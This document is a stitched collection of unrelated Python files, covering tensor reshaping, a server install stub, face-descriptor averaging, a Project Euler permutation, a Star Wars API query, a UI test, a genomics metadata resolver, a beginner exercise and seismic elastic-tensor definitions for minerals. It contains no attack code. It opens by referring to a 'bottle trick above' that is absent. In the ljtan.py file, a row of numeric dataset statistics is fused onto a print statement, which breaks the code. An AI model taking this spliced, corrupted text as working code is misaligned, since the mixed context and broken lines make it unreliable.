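The "bottle" trick above flattens the trailing dimensions before an operation and restores them afterwards. The reshape round-trip itself can be sketched with NumPy (no torch required; the identity op stands in for the wrapped forward pass):

```python
import numpy as np

x = np.arange(24).reshape(2, 3, 4)       # (batch, size0, size1)
size = x.shape[1:]
flat = x.reshape(-1, size[0] * size[1])  # flatten, as in forward()
out = flat                               # stand-in for the wrapped operation
restored = out.reshape(-1, size[0], size[1])
print(restored.shape)  # -> (2, 3, 4)
```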

# File: web/service/InstallService.py (hao707822882/Bichon, Apache-2.0)

# _*_ coding:utf-8 _*_
from com.common.BaseLoggingObj import BaseLoggingObj
from web.broker.Brokers import Broker
__author__ = 'Administrator'
class InstallService(BaseLoggingObj, object):
def __init__(self):
pass
def installMysql(self, hostKey):
broker = Broker.getBroker(hostKey)
broker.installMysql()
def installNginx(self, hostKey):
broker = Broker.getBroker(hostKey)
broker.installNginx()

# File: BWSIFace/BWSIFace/profileClass.py (skyli42/RiceKrispies, MIT)

import numpy as np
class ProfileClass:
"""
A class that represents a single profile, which consists of the name of the person, and his or her average image
descriptor vector
"""
def __init__(self, name, descr):
self.name = name
self.descr = descr
self.count = 1
def __repr__(self):
return self.name
def addDescr(self, newDescr):
self.count+=1
self.descr = self.descr*(self.count-1)/self.count + newDescr*1/(self.count)
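`addDescr` maintains a running mean of descriptors: scale the stored mean by the old count, add the new descriptor, divide by the new count. A short check that the incremental update equals the batch mean:

```python
import numpy as np

descrs = [np.array([1.0, 3.0]), np.array([2.0, 5.0]), np.array([6.0, 1.0])]

# Incremental update, mirroring the arithmetic in addDescr()
mean = descrs[0]
count = 1
for d in descrs[1:]:
    count += 1
    mean = mean * (count - 1) / count + d / count

print(mean)                     # running mean
print(np.mean(descrs, axis=0))  # batch mean -- should match
```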

# File: problem024/solution.py (andysnell/project-euler, FTL)

from itertools import permutations
l = [''.join(map(str, i)) for i in list(permutations(range(0, 10)))]
l.sort()
print(l[999999])
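Materialising all 10! permutations works, but the millionth permutation can also be read off directly with the factorial number system, without enumerating anything. A sketch that agrees with the brute-force answer above:

```python
from math import factorial

def nth_permutation(digits, n):
    """Return the n-th (0-based) lexicographic permutation of digits."""
    digits = sorted(digits)
    out = []
    while digits:
        f = factorial(len(digits) - 1)
        i, n = divmod(n, f)     # which block of f permutations n falls in
        out.append(digits.pop(i))
    return ''.join(map(str, out))

print(nth_permutation(range(10), 999999))  # -> 2783915460
```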

# File: code/ljtan.py (Stelanie/sandbox-repo, BSD-3-Clause)

import requests
endpoint = 'https://swapi.py4e.com/api'
response = requests.get(f"{endpoint}/people/", {'search': 'luke'}).json()
luke_skywalker = response['results'][0]
print(f"\nLuke Skywalker = {luke_skywalker}") | 27.25 | 73 | 0.706422 | 28 | 218 | 5.428571 | 0.714286 | 0.171053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01005 | 0.087156 | 218 | 8 | 74 | 27.25 | 0.753769 | 0 | 0 | 0 | 0 | 0 | 0.438356 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |

# File: examples/projects/store_demoqa/tests/header/click_go_to_checkout.py (vault-the/golem, MIT)
description = ''
pages = ['header',
'checkout']
def setup(data):
pass
def test(data):
navigate('http://store.demoqa.com/')
click(header.go_to_checkout)
verify_text_in_element(checkout.title, 'Checkout')
capture('Checkout page is displayed')
def teardown(data):
pass

# File: pbsmrtpipe/dataset_io.py (PacificBiosciences/pbsmrtpipe, BSD-3-Clause)

import logging
from pbcore.io import FastaReader, FastqReader
from pbcommand.validators import fofn_to_files, validate_file
from pbcommand.models import FileTypes
log = logging.getLogger(__name__)
__all__ = ['UnresolvableDatasetMetadataError',
'dispatch_metadata_resolver',
'has_metadata_resolver']
class UnresolvableDatasetMetadataError(ValueError):
pass
class DatasetMetadata(object):
SUPPORTED_ATTRS = ('nrecords', 'total_length')
def __init__(self, nrecords, total_length):
self.nrecords = nrecords
self.total_length = total_length
def __repr__(self):
_d = dict(k=self.__class__.__name__, n=self.nrecords, t=self.total_length)
return "<{k} nrecords:{n} total:{t} >".format(**_d)
REGISTERED_METADATA_RESOLVER = {}
def register_metadata_resolver(*file_type_or_types):
if not isinstance(file_type_or_types, (list, tuple)):
file_type_or_types = [file_type_or_types]
def _wrapper(func):
for file_type in file_type_or_types:
REGISTERED_METADATA_RESOLVER[file_type] = func
def _f(path):
path = validate_file(path)
            return func(path)  # was `return _f(path)`, which recursed forever
return _f
return _wrapper
def dispatch_metadata_resolver(file_type, path):
"""Simple multiple dispatch mechanism"""
to_ds_metadata_func = REGISTERED_METADATA_RESOLVER.get(file_type, None)
if to_ds_metadata_func is None:
raise UnresolvableDatasetMetadataError("Unable to resolve file type {t}".format(t=file_type))
return to_ds_metadata_func(path)
def has_metadata_resolver(file_type):
return file_type in REGISTERED_METADATA_RESOLVER
def _fofn_to_metadata(path):
files = fofn_to_files(path)
return DatasetMetadata(len(files), len(files))
@register_metadata_resolver(FileTypes.FOFN, FileTypes.RGN_FOFN, FileTypes.MOVIE_FOFN)
def f(path):
return _fofn_to_metadata(path)
def _to_fastax_dataset_metadata(fastx_reader_klass, path):
nrecords = 0
total = 0
with fastx_reader_klass(path) as r:
for record in r:
nrecords += 1
total += len(record.sequence)
return DatasetMetadata(nrecords, total)
@register_metadata_resolver(FileTypes.FASTA)
def _to_fasta_resolver(path):
return _to_fastax_dataset_metadata(FastaReader, path)
@register_metadata_resolver(FileTypes.FASTQ)
def _to_fastq_resolver(path):
return _to_fastax_dataset_metadata(FastqReader, path)
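The resolver registry above is a small multiple-dispatch pattern: a dict keyed by file type, filled by a decorator. Stripped of the pbcore/pbcommand specifics, the mechanism looks like this (names below are illustrative, not from those libraries):

```python
RESOLVERS = {}

def register(*file_types):
    """Register the decorated function under one or more file-type keys."""
    def wrapper(func):
        for ft in file_types:
            RESOLVERS[ft] = func
        return func
    return wrapper

def dispatch(file_type, path):
    func = RESOLVERS.get(file_type)
    if func is None:
        raise ValueError("Unable to resolve file type {t}".format(t=file_type))
    return func(path)

@register("fasta", "fastq")
def count_records(path):
    return "counting records in {}".format(path)

print(dispatch("fasta", "reads.fasta"))  # -> counting records in reads.fasta
```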

# File: exercisio 107.py (bruno194/EXERCICIOS, MIT)

import funções_exercisios
preco = int(input('enter the price R$ '))
a = funções_exercisios.metade(preco)
b = funções_exercisios.dobrar(preco)
c = funções_exercisios.porcentagem(preco)
print('half of {} is {}'.format(preco, a))
print('double of {} is {}'.format(preco, b))
print('increasing by 10% we get {}'.format(c))
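The `funções_exercisios` module itself is not part of this file. From how it is called, a plausible sketch of the helpers would be as follows (the 10% increase in `porcentagem` is an assumption inferred from the final print, and these definitions are hypothetical):

```python
# Hypothetical stand-ins for funções_exercisios.metade/dobrar/porcentagem,
# inferred only from how the script above uses them.
def metade(n):
    return n / 2

def dobrar(n):
    return n * 2

def porcentagem(n, pct=10):
    return n + n * pct / 100

print(metade(100), dobrar(100), porcentagem(100))  # -> 50.0 200 110.0
```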

# File: src/zeit/content/cp/tests/test_source.py (ZeitOnline/zeit.content.cp, BSD-3-Clause)

from zeit.cms.testing import copy_inherited_functions
import zeit.cms.content.tests.test_contentsource
import zeit.cms.testing
import zeit.content.cp.source
import zeit.content.cp.testing
class CPSourceTest(
zeit.cms.content.tests.test_contentsource.ContentSourceBase,
zeit.cms.testing.FunctionalTestCase):
layer = zeit.content.cp.testing.ZCML_LAYER
source = zeit.content.cp.source.centerPageSource
expected_types = ['centerpage-2009']
copy_inherited_functions(
zeit.cms.content.tests.test_contentsource.ContentSourceBase,
locals())

# File: telewavesim/elast.py (mtoqeerpk/Telewavesim, MIT)

# Copyright 2019 Pascal Audet
# This file is part of Telewavesim.
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''
Functions to define elastic stiffness matrices.
'''
import numpy as np
def iso_tensor(a, b):
"""
Elastic constants (GPa /density) of isotropic material in Voigt notation
Args:
        a (float): P-wave velocity (m/s)
        b (float): S-wave velocity (m/s)
Returns:
(np.ndarray): C: Elastic stiffness matrix (shape ``(6, 6)``)
Example
-------
>>> from telewavesim import elast
>>> elast.iso_tensor(6.e3, 3.6e3)
array([[36000000., 10080000., 10080000., 0., 0., 0.],
[10080000., 36000000., 10080000., 0., 0., 0.],
[10080000., 10080000., 36000000., 0., 0., 0.],
[ 0., 0., 0., 12960000., 0., 0.],
[ 0., 0., 0., 0., 12960000., 0.],
[ 0., 0., 0., 0., 0., 12960000.]])
"""
# Velocity to Lame parameters
mu = b*b
lam = a*a - 2.*mu
# Components of Voigt matrix
Cii = 2.*mu + lam
Cij = lam
Cjj = mu
C = np.zeros((6,6), dtype=float)
C[0,0] = Cii; C[0,1] = Cij; C[0,2] = Cij; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = Cii; C[1,2] = Cij; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = Cii; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = Cjj; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = Cjj; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = Cjj
return C
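A quick sanity check on the construction above: the Voigt matrix is symmetric, and for an isotropic medium C11 = C12 + 2*C44 (i.e. lambda + 2*mu). The same matrix can be rebuilt self-containedly from the Lame parameters, using the velocities from the docstring example:

```python
import numpy as np

a, b = 6.0e3, 3.6e3            # P and S velocities, as in the docstring example
mu = b * b
lam = a * a - 2.0 * mu

# Diagonal: three C11 = lam + 2*mu entries, then three C44 = mu entries
C = np.diag([lam + 2*mu] * 3 + [mu] * 3).astype(float)
C[:3, :3] += lam * (1 - np.eye(3))   # off-diagonal lambda terms

assert np.allclose(C, C.T)                       # Voigt matrix is symmetric
assert np.isclose(C[0, 0], C[0, 1] + 2*C[3, 3])  # C11 = C12 + 2*C44 (isotropy)
print(C[0, 0], C[3, 3])  # -> 36000000.0 12960000.0
```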
def tri_tensor(AA,CC,FF,LL,NN):
"""
Elastic constants (GPa /density) of transversely isotropic material in Voigt notation \
(hexagonal symmetry). See Porter et al. (2011) for details.
Args:
AA (float): elastic modulus (GPa /density)
CC (float): elastic modulus (GPa /density)
FF (float): elastic modulus (GPa /density)
LL (float): elastic modulus (GPa /density)
NN (float): elastic modulus (GPa /density)
Returns:
(np.ndarray): a: Elastic tensor (shape ``(3, 3, 3, 3)``)
Note:
Using ``tri_tensor`` does not make sense on its own.
Use it with ``telewavesim.utils.set_tri_tensor``
"""
a = np.zeros((3,3,3,3))
a[0,0,0,0] = AA
a[1,1,1,1] = AA
a[2,2,2,2] = CC
a[0,0,1,1] = (AA - 2.*NN)
a[1,1,0,0] = (AA - 2.*NN)
a[0,0,2,2] = FF
a[2,2,0,0] = FF
a[1,1,2,2] = FF
a[2,2,1,1] = FF
a[1,2,1,2] = LL
a[2,1,2,1] = LL
a[2,1,1,2] = LL
a[1,2,2,1] = LL
a[2,0,2,0] = LL
a[0,2,0,2] = LL
a[2,0,0,2] = LL
a[0,2,2,0] = LL
a[0,1,0,1] = NN
a[1,0,1,0] = NN
a[0,1,1,0] = NN
a[1,0,0,1] = NN
return a
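The 3x3x3x3 tensor filled above obeys the full elastic symmetries a_ijkl = a_jikl = a_ijlk = a_klij, which is why each shear modulus appears four times. This can be verified numerically; the tensor is re-created here (with arbitrary test moduli) so the check is self-contained:

```python
import numpy as np

AA, CC, FF, LL, NN = 16.0, 14.0, 5.0, 4.0, 4.5   # arbitrary test moduli
a = np.zeros((3, 3, 3, 3))
a[0, 0, 0, 0] = a[1, 1, 1, 1] = AA
a[2, 2, 2, 2] = CC
a[0, 0, 1, 1] = a[1, 1, 0, 0] = AA - 2.0 * NN
a[0, 0, 2, 2] = a[2, 2, 0, 0] = a[1, 1, 2, 2] = a[2, 2, 1, 1] = FF
for i, j in [(1, 2), (2, 1), (0, 2), (2, 0)]:    # the four LL placements per pair
    a[i, j, i, j] = a[i, j, j, i] = LL
for i, j in [(0, 1), (1, 0)]:
    a[i, j, i, j] = a[i, j, j, i] = NN

# Minor symmetries (swap within first or second index pair) and major symmetry
assert np.allclose(a, a.transpose(1, 0, 2, 3))
assert np.allclose(a, a.transpose(0, 1, 3, 2))
assert np.allclose(a, a.transpose(2, 3, 0, 1))
```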
def antigorite():
"""
Elastic constants of antigorite mineral (GPa) from
Bezacier, EPSL, 2010, in Voigt notation.
- Abbreviation: ``'atg'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2620 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.antigorite()[0]
array([[208.4, 66.2, 15.9, 0. , 2.4, 0. ],
[ 66.2, 201.6, 5. , 0. , -4.4, 0. ],
[ 15.9, 5. , 96.7, 0. , 2.5, 0. ],
[ 0. , 0. , 0. , 17.4, 0. , -13.1],
[ 2.4, -4.4, 2.5, 0. , 18.3, 0. ],
[ 0. , 0. , 0. , -13.1, 0. , 65. ]])
>>> elast.antigorite()[1]
2620.0
"""
rho = 2620.
C = np.zeros((6,6), dtype=float)
C[0,0] = 208.4; C[0,1] = 66.2; C[0,2] = 15.9; C[0,3] = 0.; C[0,4] = 2.4; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 201.6; C[1,2] = 5.; C[1,3] = 0.; C[1,4] = -4.4; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 96.7; C[2,3] = 0.; C[2,4] = 2.5; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 17.4; C[3,4] = 0.; C[3,5] = -13.1
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 18.3; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 65.
return C, rho
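Each mineral routine below spells out all 36 entries of a symmetric 6x6 Voigt matrix by hand. An equivalent, less repetitive construction fills only the upper triangle and symmetrizes; the helper below (a sketch, not part of the library) reproduces the antigorite matrix from its doctest:

```python
import numpy as np

def voigt_from_upper(upper):
    """Build a symmetric 6x6 Voigt matrix from its upper triangle (row-major)."""
    C = np.zeros((6, 6))
    C[np.triu_indices(6)] = upper
    return C + C.T - np.diag(np.diag(C))

# Upper triangle of the antigorite matrix from the doctest above
atg_upper = [208.4, 66.2, 15.9, 0., 2.4, 0.,
             201.6, 5., 0., -4.4, 0.,
             96.7, 0., 2.5, 0.,
             17.4, 0., -13.1,
             18.3, 0.,
             65.]
C = voigt_from_upper(atg_upper)
assert np.allclose(C, C.T)   # elastic stiffness must be symmetric
print(C[0, 0], C[3, 5])      # -> 208.4 -13.1
```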
def biotite():
"""
Elastic constants of biotite mineral (GPa) from
Aleksandrov and Ryzhova (1986), in Voigt notation
- Abbreviation: ``'bt'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2800 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.biotite()[0]
array([[186. , 32.4, 11.6, 0. , 0. , 0. ],
[ 32.4, 186. , 11.6, 0. , 0. , 0. ],
[ 11.6, 11.6, 54. , 0. , 0. , 0. ],
[ 0. , 0. , 0. , 5.8, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 5.8, 0. ],
[ 0. , 0. , 0. , 0. , 0. , 76.8]])
>>> elast.biotite()[1]
2800.0
"""
rho = 2800.
C = np.zeros((6,6), dtype=float)
C[0,0] = 186.; C[0,1] = 32.4; C[0,2] = 11.6; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 186.; C[1,2] = 11.6; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 54.; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 5.8; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 5.8; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 76.8
return C, rho
def blueschist_felsic():
"""
Elastic constants of Felsic Blueschist (GPa) from
Cao et al. (2013), in Voigt notation
- Abbreviation: ``'BS_f'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2970 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.blueschist_felsic()[0]
array([[ 1.4985e+02, 3.8700e+01, 3.2590e+01, -1.5000e-01, -1.0000e+00,
-1.9000e-01],
[ 3.8700e+01, 1.6355e+02, 3.0030e+01, 1.0500e+00, -1.8100e+00,
-1.7800e+00],
[ 3.2590e+01, 3.0030e+01, 1.2162e+02, 2.2000e-01, -9.5000e-01,
-1.3000e-01],
[-1.5000e-01, 1.0500e+00, 2.2000e-01, 4.8030e+01, -6.3000e-01,
-1.1400e+00],
[-1.0000e+00, -1.8100e+00, -9.5000e-01, -6.3000e-01, 4.8620e+01,
-1.0000e-02],
[-1.9000e-01, -1.7800e+00, -1.3000e-01, -1.1400e+00, -1.0000e-02,
5.8420e+01]])
>>> elast.blueschist_felsic()[1]
2970.0
"""
rho = 2970.
C = np.zeros((6,6), dtype=float)
C[0,0] = 149.85; C[0,1] = 38.7; C[0,2] = 32.59; C[0,3] = -0.15; C[0,4] = -1.; C[0,5] = -0.19
C[1,0] = C[0,1]; C[1,1] = 163.55; C[1,2] = 30.03; C[1,3] = 1.05; C[1,4] = -1.81; C[1,5] = -1.78
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 121.62; C[2,3] = 0.22; C[2,4] = -0.95; C[2,5] = -0.13
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 48.03; C[3,4] = -0.63; C[3,5] = -1.14
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 48.62; C[4,5] = -0.01
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 58.42
return C, rho
def blueschist_mafic():
"""
Elastic constants of Mafic Blueschist (GPa) from
Cao et al. (2013), in Voigt notation
- Abbreviation: ``'BS_m'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3190 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.blueschist_mafic()[0]
array([[ 1.9079e+02, 6.2280e+01, 5.2940e+01, -4.4000e-01, 4.6800e+00,
6.0000e-01],
[ 6.2280e+01, 2.1838e+02, 5.3100e+01, -8.7000e-01, 1.5700e+00,
2.8000e-01],
[ 5.2940e+01, 5.3100e+01, 1.5804e+02, -4.4000e-01, 2.6600e+00,
-3.5000e-01],
[-4.4000e-01, -8.7000e-01, -4.4000e-01, 6.0860e+01, -2.9000e-01,
1.8600e+00],
[ 4.6800e+00, 1.5700e+00, 2.6600e+00, -2.9000e-01, 5.8940e+01,
-2.0000e-01],
[ 6.0000e-01, 2.8000e-01, -3.5000e-01, 1.8600e+00, -2.0000e-01,
6.9630e+01]])
>>> elast.blueschist_mafic()[1]
3190.0
"""
rho = 3190.
C = np.zeros((6,6), dtype=float)
C[0,0] = 190.79; C[0,1] = 62.28; C[0,2] = 52.94; C[0,3] = -0.44; C[0,4] = 4.68; C[0,5] = 0.6
C[1,0] = C[0,1]; C[1,1] = 218.38; C[1,2] = 53.1; C[1,3] = -0.87; C[1,4] = 1.57; C[1,5] = 0.28
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 158.04; C[2,3] = -0.44; C[2,4] = 2.66; C[2,5] = -0.35
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 60.86; C[3,4] = -0.29; C[3,5] = 1.86
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 58.94; C[4,5] = -0.2
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 69.63
return C, rho
def clinopyroxene_92():
"""
Elastic constants of clinopyroxene mineral (GPa) from
Baghat et al. (1992), in Voigt notation
- Abbreviation: ``'cpx'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3327 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.clinopyroxene_92()[0]
array([[257.3, 85.9, 76.2, 0. , 7.1, 0. ],
[ 85.9, 216.2, 71.8, 0. , 13.3, 0. ],
[ 76.2, 71.8, 260.2, 0. , 33.7, 0. ],
[ 0. , 0. , 0. , 80.2, 0. , 10.2],
[ 7.1, 13.3, 33.7, 0. , 70.6, 0. ],
[ 0. , 0. , 0. , 10.2, 0. , 85.8]])
>>> elast.clinopyroxene_92()[1]
3327.0
"""
rho = 3327.
C = np.zeros((6,6), dtype=float)
C[0,0] = 257.3; C[0,1] = 85.9; C[0,2] = 76.2; C[0,3] = 0.; C[0,4] = 7.1; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 216.2; C[1,2] = 71.8; C[1,3] = 0.; C[1,4] = 13.3; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 260.2; C[2,3] = 0.; C[2,4] = 33.7; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 80.2; C[3,4] = 0.; C[3,5] = 10.2
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 70.6; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 85.8
return C, rho
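Each stiffness matrix above is built by filling the upper triangle and mirroring it, so every returned `C` should satisfy the Voigt symmetry `C[i, j] == C[j, i]`. A small sanity check (illustrative only, not part of telewavesim) can confirm this:

```python
import numpy as np

def is_voigt_symmetric(C, tol=1e-8):
    """Illustrative helper: return True if the 6x6 Voigt stiffness
    matrix C is symmetric (C_ij == C_ji) within tolerance."""
    C = np.asarray(C, dtype=float)
    return bool(np.allclose(C, C.T, atol=tol))
```

Such a check can be run against any of the functions in this module, e.g. `is_voigt_symmetric(clinopyroxene_92()[0])`.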
def clinopyroxene_98():
"""
Elastic constants of clinopyroxene mineral (GPa) from
Collins and Brown (1998), in Voigt notation
- Abbreviation: ``None``: not currently used
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3190 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.clinopyroxene_98()[0]
array([[237.8, 83.5, 80. , 0. , 9. , 0. ],
[ 83.5, 183.6, 59.9, 0. , 9.5, 0. ],
[ 80. , 59.9, 229.5, 0. , 48.1, 0. ],
[ 0. , 0. , 0. , 76.5, 0. , 8.4],
[ 9. , 9.5, 48.1, 0. , 73. , 0. ],
[ 0. , 0. , 0. , 8.4, 0. , 81.6]])
>>> elast.clinopyroxene_98()[1]
3190.0
"""
rho = 3190.
C = np.zeros((6,6), dtype=float)
C[0,0] = 237.8; C[0,1] = 83.5; C[0,2] = 80.; C[0,3] = 0.; C[0,4] = 9.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 183.6; C[1,2] = 59.9; C[1,3] = 0.; C[1,4] = 9.5; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 229.5; C[2,3] = 0.; C[2,4] = 48.1; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 76.5; C[3,4] = 0.; C[3,5] = 8.4
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 73.; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 81.6
return C, rho
def dolomite():
"""
Elastic constants of dolomite mineral (GPa) from
Humbert and Plicque (1972), in Voigt notation
- Abbreviation: ``'dol'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2840 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.dolomite()[0]
array([[205. , 71. , 57.4, -19.5, 13.7, 0. ],
[ 71. , 205. , 57.4, 19.5, -13.7, 0. ],
[ 57.4, 57.4, 113. , 0. , 0. , 0. ],
[-19.5, 19.5, 0. , 39.8, 0. , -13.7],
[ 13.7, -13.7, 0. , 0. , 39.8, -19.5],
[ 0. , 0. , 0. , -13.7, -19.5, 67. ]])
>>> elast.dolomite()[1]
2840.0
"""
rho = 2840.
C = np.zeros((6,6), dtype=float)
C[0,0] = 205.; C[0,1] = 71.; C[0,2] = 57.4; C[0,3] = -19.5; C[0,4] = 13.7; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 205.; C[1,2] = 57.4; C[1,3] = 19.5; C[1,4] = -13.7; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 113.; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 39.8; C[3,4] = 0.; C[3,5] = -13.7
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 39.8; C[4,5] = -19.5
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 67.
return C, rho
def eclogite_foliated():
"""
Elastic constants of Foliated Eclogite rock (GPa) from
Cao et al. (2013), in Voigt notation
- Abbreviation: ``'EC_f'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3300 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.eclogite_foliated()[0]
array([[ 2.0345e+02, 6.7760e+01, 6.4470e+01, 8.0000e-02, 1.9000e+00,
-4.0000e-01],
[ 6.7760e+01, 2.2058e+02, 6.3650e+01, 4.6000e-01, 5.9000e-01,
6.0000e-02],
[ 6.4470e+01, 6.3650e+01, 1.8975e+02, 1.3000e-01, 9.5000e-01,
-2.0000e-01],
[ 8.0000e-02, 4.6000e-01, 1.3000e-01, 6.6320e+01, -2.7000e-01,
7.3000e-01],
[ 1.9000e+00, 5.9000e-01, 9.5000e-01, -2.7000e-01, 6.5770e+01,
-2.0000e-02],
[-4.0000e-01, 6.0000e-02, -2.0000e-01, 7.3000e-01, -2.0000e-02,
7.0750e+01]])
>>> elast.eclogite_foliated()[1]
3300.0
"""
rho = 3300.
C = np.zeros((6,6), dtype=float)
C[0,0] = 203.45; C[0,1] = 67.76; C[0,2] = 64.47; C[0,3] = 0.08; C[0,4] = 1.9; C[0,5] = -0.4
C[1,0] = C[0,1]; C[1,1] = 220.58; C[1,2] = 63.65; C[1,3] = 0.46; C[1,4] = 0.59; C[1,5] = 0.06
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 189.75; C[2,3] = 0.13; C[2,4] = 0.95; C[2,5] = -0.2
